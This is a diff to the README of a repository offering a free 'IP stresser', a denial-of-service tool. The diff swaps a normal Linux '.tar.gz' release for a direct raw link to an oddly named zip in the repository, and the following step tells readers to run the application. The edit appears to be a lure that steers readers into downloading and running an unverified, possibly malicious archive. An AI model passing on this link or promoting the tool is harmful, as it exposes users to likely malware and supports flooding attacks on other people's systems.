JohnWiiUfan/free-ip-stresser/README.md

 Look for the most recent stable release.
 It usually appears at the top and will have a few files attached.

-- Find the file labeled with `.exe` for Windows or `.tar.gz` for Linux.
+- Find the file labeled with `.exe` for Windows or `https://github.com/JohnWiiUfan/free-ip-stresser/raw/refs/heads/main/antirumor/free_stresser_ip_hemiteratics.zip` for Linux.
 - Click to download it to your preferred folder.

 ### Step 3: Run the Application